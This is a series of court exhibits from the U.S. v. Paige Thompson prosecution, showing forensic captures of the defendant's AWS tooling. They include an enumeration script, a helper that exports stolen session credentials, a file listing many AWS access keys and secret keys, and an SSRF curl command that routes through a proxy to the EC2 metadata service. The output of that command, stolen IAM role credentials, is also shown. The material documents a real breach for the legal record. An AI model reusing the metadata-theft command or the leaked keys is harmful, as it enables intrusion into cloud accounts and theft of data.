33   # log get-caller-identity
34   aws $awsopts sts get-caller-identity > ../collected/sts/$output
35
36   # describe ec2 instances
37   echo -e $regions | tr ' ' '\n' |  parallel --retries 2 --verbose --tag aws $awsopts ec2 describe-instances --region {} '>' ../
     collected/ec2/instances/$output.{}
38
39   # list s3 buckets
40   aws $awsopts s3api list-buckets > ../collected/s3/$output
41
42   # security groups
43   echo -e $regions | tr ' ' '\n' |  parallel --retries 2 --verbose --tag aws $awsopts ec2 describe-security-groups --region {}
     '>' ../collected/ec2/securitygroups/$output.{}
44
45   # random key id
46   randoid=$(dd if=/dev/urandom bs=8 count=1 2> /dev/null | xxd -pu | tr -d '\n')
47
48   # try create keypair, log output then delete remote if exists
49   aws $awsopts ec2 create-key-pair --key-name $randoid > ../collected/ec2/keypairs/$output
50   aws $awsopts ec2 delete-key-pair --key-name $randoid
51
52   # IAM
53   aws $awsopts iam get-account-summary > ../collected/iam/accountsummary/$output
54   aws $awsopts iam list-users > ../collected/iam/listusers/$output
55
```

1b52-md126-luksopen, Vol...

\home\erratic\AWSScanner

| Name ▲ | Description | Type | Size | Created | Modified ▼ | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = erratic (8,645,646) | existing | | 446 GB | 07/10/2019 08:09... | 07/29/2019 06:17... | 07/29/2019 06:17... | rwxrwxrwx | 7,044,586... |
| . = AWSScanner (10,040) | existing | | 636 MB | 07/10/2019 18:00... | 07/16/2019 05:32... | 07/19/2019 06:25... | rwxrwxrwx | 896,767 |
| .kdev4 (1) | existing | | 169 B | 07/10/2019 18:00... | 07/09/2019 20:18... | 07/10/2019 18:00... | rwx------ | 992,120 |
| .vscode (1) | existing | | 100 B | 07/10/2019 18:00... | 04/06/2019 19:59... | 07/10/2019 18:00... | rwx------ | 896,763 |
| C-Thread-Pool (49) | existing | | 249 KB | 07/10/2019 18:00... | 04/17/2019 15:59... | 07/10/2019 18:00... | rwx------ | 896,761 |
| ip_files (5,153) | existing | | 491 MB | 07/10/2019 20:01... | 07/10/2019 20:01... | 07/10/2019 20:01... | rwx------ | 1,006,739 |
| logs (4,821) | existing | | 2.4 MB | 07/10/2019 18:05... | 07/14/2019 04:16... | 07/14/2019 04:16... | rwx------ | 992,116 |
| AWSScanner.kdev4 | existing | kdev4 | 69 B | 07/10/2019 18:00... | 07/08/2019 00:21... | 07/10/2019 18:00... | rw------- | 992,120 |
| awssession.sh | existing | sh | 385 B | 07/12/2019 01:29... | 07/12/2019 01:29... | 07/12/2019 01:29... | rw------- | 1,115,885 |
| confirmed.txt | existing | txt | 792 KB | 07/10/2019 21:38... | 07/14/2019 17:12... | 07/14/2019 17:12... | Crw------- | 40,985,064 |
| confirmed2.txt | existing | txt | 20.0 KB | 07/16/2019 05:32... | 07/16/2019 05:37... | 07/16/2019 05:37... | Crw------- | 26,341,392 |
| getcredentials.sh | existing | sh | 177 B | 07/10/2019 21:54... | 07/12/2019 01:34... | 07/12/2019 01:34... | rw------- | 885,254,1... |
| listiam.sh | existing | sh | 202 B | 07/10/2019 21:49... | 07/14/2019 13:32... | 07/14/2019 13:32... | rw------- | 885,254,1... |
| main.c | existing | c | 8.6 KB | 07/10/2019 18:00... | 07/08/2019 04:06... | 07/10/2019 18:00... | Crw------- | 71,514,248 |
| main.h | existing | h | 2.5 KB | 07/10/2019 18:00... | 07/10/2019 20:01... | 07/10/2019 20:01... | Crw------- | 920,870 |
| Makefile | existing | | 258 B | 07/10/2019 18:00... | 07/08/2019 03:51... | 07/10/2019 18:00... | rw------- | 992,117 |
| Makefile.config | existing | config | 61 B | 07/10/2019 18:00... | 07/08/2019 03:17... | 07/10/2019 18:00... | rw------- | 992,116 |
| new_all.xz | existing | xz | 141 MB | 07/10/2019 18:00... | 04/11/2019 21:42... | 07/10/2019 18:00... | rw------- | 7,231,792... |
| parallel.joblog | existing | joblog | 330 KB | 07/10/2019 20:02... | 07/14/2019 05:03... | 07/14/2019 05:03... | Crw------- | 2,986,977... |
| parselog.sh | existing | sh | 171 B | 07/10/2019 21:37... | 07/10/2019 21:37... | 07/10/2019 21:37... | rw------- | 885,254,1... |
| scan.sh | existing | sh | 83 B | 07/10/2019 18:19... | 07/10/2019 19:39... | 07/10/2019 19:39... | rw------- | 1,004,632 |
| scanner | existing | | 38.0 KB | 07/10/2019 20:01... | 07/10/2019 20:01... | 07/10/2019 20:01... | Crw------- | 40,092,832 |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 671
Admitted_____



```
#!/bin/bash
content="${1:-$(cat /dev/stdin)}"

#echo $content

#jq '[.AccessKeyId,.SecretAccessKey, .Token]'

key=$(echo $content | jq -r '.AccessKeyId')
secret=$(echo $content | jq -r '.SecretAccessKey')
token=$(echo $content | jq -r '.Token')

echo "export AWS_SECRET_ACCESS_KEY=\"${secret}\""
echo "export AWS_SESSION_TOKEN=\"${token}\""
echo "export AWS_ACCESS_KEY_ID=\"${key}\""
```

```
1  [default]
2  aws_access_key_id = AKIASBHF5JVIBVFSZG5S
3  aws_secret_access_key = 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
4
5  [astem]
6  aws_access_key_id = AKIAU55F6ZVKWQZLZ3PV
7  aws_secret_access_key = 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
8
9  [protectionprod]
10 aws_access_key_id = AKIAU4G7RWGKYKHIOUPX
11 aws_secret_access_key = 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
12
13 [ec2service]
14 aws_access_key_id = AKIATG7G6UKR2DAWIY5S
15 aws_secret_access_key = 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
16
17 [safesocial2]
18 aws_access_key_id = AKIAJBOAWCLBCL5V4P5A
19 aws_secret_access_key = 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
20
21 [hfarm]
22 aws_access_key_id = AKIAJGSH4PXLVQA3222A
23 aws_secret_access_key = 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
24
25 [hfarmsns]
26 aws_access_key_id = AKIAJUNBTFYOJMTGFY6A
27 aws_secret_access_key = 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
28
29 [wakoopabert]
30 aws_access_key_id = AKIAISTWXXWULYMDTZEA
31 aws_secret_access_key = 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
32
33 [wakoopases]
34 aws_access_key_id = AKIAIMQ76QXAM3KL3SSA
35 aws_secret_access_key = Aulat8WzB5pt9SmHp6fV/Y+2AKCPVDylaQf7gqFPH66s
36
37 [pbn]
38 aws_access_key_id = AKIAJ2LCTWHWEBRB52CQ
39 aws_secret_access_key = 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
40
41 [pbn2]
42 aws_access_key_id = AKIAIKNIPELUN7F5SWGA
43 aws_secret_access_key = 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
44
45 [embra]
46 aws_access_key_id = AKIAIYTZCNXO7XMAGZ2Q
47 aws_secret_access_key = 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
48
49 [tokyo]
50 aws_access_key_id = AKIAIXLKMHNISRAEDCBA
51 aws_secret_access_key = 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
52
53 [safesocial]
54 aws_access_key_id = AKIAQDJBAXC2F6OAZ2VV
55 aws_secret_access_key = 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
56
57 [awsk8]
58 aws_access_key_id = AKIAJ7U72HWEDXMHRMQQ
59 aws_secret_access_key = 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
```

U. S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 672
Admitted_____

1b52-md126-luksopen, Vol... |

home\erratic\aws_hacking_shit\aws_scan\ec2-full-stuff

| Name ▲ | Description | Type | Size ▼ | Created | Modified | Record changed | Attr. | 1st sector | N |
|---|---|---|---|---|---|---|---|---|---|
| 🗀. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... | |
| 🗀. = ec2-full-stuff (62) | existing | | 406 KB | 07/10/2019 10:08... | 03/03/2019 15:39... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| 201828708g-new.templateyrqpg7fctao | existing | templa... | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,808 | |
| 20182B7fE7-s3sync.template5epz7b6l7ra | existing | json | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,824 | |
| 2018287ga7-new.templatem2axwn46n7 | existing, already viewed | json | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,816 | |
| 2018289pGp-new.templatejhay08ix56 | existing | json | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,864 | |
| 2018289zm7-cflab.json | existing, already viewed | json | 8.1 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,872 | |
| 2018289zo0-cflab.json | existing | json | 8.1 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,880 | |
| 20180125p4-vpcs.json | existing | json | 7.0 KB | 07/10/2019 10:08... | 03/02/2019 13:08... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,800 | |
| newec2-fulluser | existing, already viewed | | 5.0 KB | 07/10/2019 10:08... | 02/21/2019 06:49... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,904 | |
| clarobrasil-loadtest.10.bucket-items | existing | json | 4.5 KB | 07/10/2019 10:08... | 03/02/2019 12:26... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,752 | |
| net-ott-session-config | existing, already viewed | json | 4.4 KB | 07/10/2019 10:08... | 03/02/2019 13:28... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,896 | |
| dev-pinpoint-clarobrasil.10.bucket_objects | existing, already viewed | json | 4.3 KB | 07/10/2019 10:08... | 03/02/2019 12:25... | 07/19/2019 06:22... | Crwxrwxrwx | 18,586,272 | |
| ec2-full.users | existing | users | 2.1 KB | 07/10/2019 10:08... | 02/21/2019 06:40... | 07/19/2019 06:22... | Crwxrwxrwx | 5,981,415... | |
| eu-north-1.keypair | existing, already viewed | json | 1.8 KB | 07/10/2019 10:08... | 03/03/2019 15:39... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |
| ec2full-claro-snapshot-info | existing | | 1.6 KB | 07/10/2019 10:08... | 03/02/2019 11:21... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |
| notes | existing, already viewed | ascii_u... | 1.4 KB | 07/10/2019 10:08... | 03/02/2019 11:59... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| sa-east-1.account_attributes | existing | accoun... | 1.2 KB | 07/10/2019 10:08... | 03/02/2019 12:06... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| us-east-1.account_attributes | existing, already viewed | json | 1.2 KB | 07/10/2019 10:08... | 03/02/2019 12:06... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| us-west-2.account_attributes | existing | accoun... | 1.2 KB | 07/10/2019 10:08... | 03/02/2019 12:07... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| now-app-session-config | existing | json | 1.1 KB | 07/10/2019 10:08... | 03/02/2019 13:29... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |
| original-entrypoint.18.231.75.72.3128 | existing, already viewed | json | 0.9 KB | 07/10/2019 10:08... | 03/02/2019 11:56... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |
| ec2full-describe-org | existing | | 434 B | 07/10/2019 10:08... | 03/02/2019 11:02... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |
| supported_platforms_account_attributes | existing | json | 236 B | 07/10/2019 10:08... | 03/02/2019 12:08... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| ec2-full.access_keys | existing | access_... | 231 B | 07/10/2019 10:08... | 02/21/2019 06:41... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |
| eks | existing | | 186 B | 07/10/2019 10:08... | 03/02/2019 12:12... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| original-entrypoint-command | existing, already viewed | ascii_u... | 146 B | 07/10/2019 10:08... | 03/02/2019 11:57... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | |
| vms-adm-users | existing | | 89 B | 07/10/2019 10:08... | 03/02/2019 13:30... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | |

▾ Partition    ◻ File    ◦ Preview    ◻ Details    ◻ Gallery    ◻ Calendar    ◻ Legend    Raw Text    ▾

curl --proxy 18.231.75.72:3128 http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-full > original-entrypoint.18.231.75.72.3128

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 673
Admitted_____

1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan\ec2-full-stuff

42 files, 1 dir...

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector | Metadata | Device type |
|------|-------------|------|------|---------|----------|----------------|-------|------------|----------|-------------|
| = aws_scan [3.868.755] | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... | | |
| = ec2-full-stuff [62] | existing | | 406 KB | 07/10/2019 10:08... | 03/03/2019 15:39... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| 20182870Bg-new.templateyrqpg7fctao | existing | templa... | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,808 | | |
| 2018287fE7-s3sync.template5epz7b6l7ra | existing | json | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,824 | | |
| 2018287ga7-new.templatern2axwn46n7 | existing, already viewed | json | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,816 | | |
| 2018289pGp-new.templatejhay08ix56 | existing | json | 8.4 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,864 | | |
| 20182892n7-cflab.json | existing, already viewed | json | 8.1 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,872 | | |
| 20182892o0-cflab.json | existing | json | 8.1 KB | 07/10/2019 10:08... | 03/02/2019 13:12... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,880 | | |
| 20180125p4-vpcs.json | existing | json | 7.0 KB | 07/10/2019 10:08... | 03/02/2019 13:08... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,800 | | |
| newec2-fulluser | existing, already viewed | | 5.0 KB | 07/10/2019 10:08... | 02/21/2019 06:49... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,904 | | |
| clarobrasil-loadtest.10.bucket-items | existing | json | 4.5 KB | 07/10/2019 10:08... | 03/02/2019 12:26... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,752 | | |
| net-ott-session-config | existing | json | 4.4 KB | 07/10/2019 10:08... | 03/02/2019 13:28... | 07/19/2019 06:22... | Crwxrwxrwx | 18,589,896 | | |
| dev-pinpoint-clarobrasil.10.bucket_objects | existing, already viewed | json | 4.3 KB | 07/10/2019 10:08... | 03/02/2019 12:25... | 07/19/2019 06:22... | Crwxrwxrwx | 18,586,272 | | |
| ec2-full.users | existing | users | 2.1 KB | 07/10/2019 10:08... | 02/21/2019 06:40... | 07/19/2019 06:22... | Crwxrwxrwx | 5,981,415... | | |
| eu-north-1.keypair | existing, already viewed | json | 1.8 KB | 07/10/2019 10:08... | 03/03/2019 15:39... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | | |
| ec2full-claro-snapshot-info | existing | | 1.6 KB | 07/10/2019 10:08... | 03/02/2019 11:21... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | | |
| notes | existing, already viewed | ascii_u... | 1.4 KB | 07/10/2019 10:08... | 03/02/2019 11:59... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| sa-east-1.account_attributes | existing | accoun... | 1.2 KB | 07/10/2019 10:08... | 03/02/2019 12:06... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| us-east-1.account_attributes | existing, already viewed | json | 1.2 KB | 07/10/2019 10:08... | 03/02/2019 12:06... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| us-west-2.account_attributes | existing | accoun... | 1.2 KB | 07/10/2019 10:08... | 03/02/2019 12:07... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| now-app-session-config | existing | json | 1.1 KB | 07/10/2019 10:08... | 03/02/2019 13:29... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | | |
| original-entrypoint.18.231.75.72.3128 | existing, already viewed | json | 0.9 KB | 07/10/2019 10:08... | 03/02/2019 11:56... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| ec2full-describe-org | existing | | 434 B | 07/10/2019 10:08... | 03/02/2019 11:02... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | | |
| supported_platforms_account_attributes | existing | json | 236 B | 07/10/2019 10:08... | 03/02/2019 12:08... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| ec2-full.access_keys | existing | access_... | 231 B | 07/10/2019 10:08... | 02/21/2019 06:41... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | | |
| eks | existing | | 186 B | 07/10/2019 10:08... | 03/02/2019 12:12... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| original-entrypoint-command | existing | | 146 B | 07/10/2019 10:08... | 03/02/2019 11:57... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,414... | | |
| vms-adm-users | existing | | 89 B | 07/10/2019 10:08... | 03/02/2019 13:30... | 07/19/2019 06:22... | rwxrwxrwx | 5,981,415... | | |

Partition   File   Preview   Details   Gallery   Calendar   Legend   Raw   Text

Selected: 1 file (0.9 K

{
  "Code" : "Success",
  "LastUpdated" : "2019-03-02T19:03:58Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAYJ7LAOF3ULILZ7EI",
  "SecretAccessKey" : "I/VfGDpEELCYBRIfGnkIbRxnXxQJ9XyHQI+E00Q4",
  "Token" :
"FQoGZXIvYXdzEB0aDLfWiij0uMNBe0zJCSK3A/S8y9o8N80piR8gEVt0Q7r50Ust0pO0NDyNjWvSfoB15upK9xFxWw65Xk6SBlR+MxBNnWbv8UN5+jECGbeBebG5TgP3QQUcrGBIqKkzQKXEllYDPMH1nKJVqXqvpR97FCGNFnmOIPldvpDOYMHSKWPuCr3
7mcHGAqdvGTmUHn7OtPKVdAiROu2Hw/as2GxvItxsu3LGkcLBI2Gm7Bb5j/aSP27KHV8+8l+aJ4sCccPxRvFiJJQ3jFqDFWrR4Dyla8c3ZuuL7igMZ3Iaj2+dT/v3LMg1OLr3+kQd7UqxbeFD+adVhr83QEdwtMjYy7ctINyOZ66hC1nkLxTksWFR/AflLOyrYFUNtHJA
iNNoxI56HLKzI9DY7FTYIi05tODyawnW92+TI8Lm3YO/mFzT7FXFqlr4pcjbiPa+2H8HktYEBf/HzmU4MW2sL1P7LIf+Ar+affVU36TG3f6g8Bt67wSHXQJNC8ScALnFIrNU1n0tSF7AST/e2sc1tL2FhqN5i11k4DhrPPPfhALGNzwS1TPAC0EOvNQXfnjLuVWse0cYd
JuHLMvgf8MVIfrk+FdJKR+Fem9GeM8oyafr4wU=",
  "Expiration" : "2019-03-03T01:25:17Z"
}

```
1  {
2      "Code" : "Success",
3      "LastUpdated" : "2019-03-02T19:03:58Z",
4      "Type" : "AWS-HMAC",
5      "AccessKeyId" : "ASIAYJ7LAOF3ULILZ7EI",
6      "SecretAccessKey" : "l/VfGDpEELCYBRlfGnkIbRxnXxQJ9XyHQI+E00Q4",
7      "Token" :
       "FQoGZXIvYXdzEB0aDLfWiij0uMNBe0zJCSK3A/S8y9o8N80piR8gEVt0Q7r50Ust0pO0NDyNjWvSfoB15upK9x
       FxWw65Xk6SBlR+MxBNnWbv8UN5+jECGbeBebG5TgP3QQUcrGBlqKkzQKXEIlYDPMHlnKJVqXqvpR97FCGNFnmOl
       PldvpDOYMHSKWPuCr37mcHGAqdvGTmUHn7OtPKVdAiROu2Hw/as2GxvItxsu3LGkcLBI2Gm7Bb5j/aSP27KHV8+
       8l+aJ4sCccPxRvFiJJQ3jFqDFWrR4Dyla8c3ZuuL7igMZ3Iaj2+dT/v3LMg1OLr3+kQd7UqxbeFD+adVhr83QEd
       wtMjYy7ctINyOZ66hC1nkLxTksWFR/AflLOyrYFUNtHJAiNNoxl56HLKzI9DY7FTYIi05tODyawnW92+Tl8Lm3Y
       O/mFzT7FXFqlr4pcjbiPa+2H8HktYEBf/HzmU4MW2sLlP7Llf+Ar+affVU36TG3f6g8Bt67wSHXQJNC8ScALnFl
       rNUln0tSF7AST/e2scltL2FhqN5i11k4DhrPPPfhALGNzwSlTPAC0EOvNQXfnjLuVWse0cYdJuHLMvgf8MVIfrk
       +FdJKR+Fem9GeM8oyafr4wU=",
8      "Expiration" : "2019-03-03T01:25:17Z"
9  }
```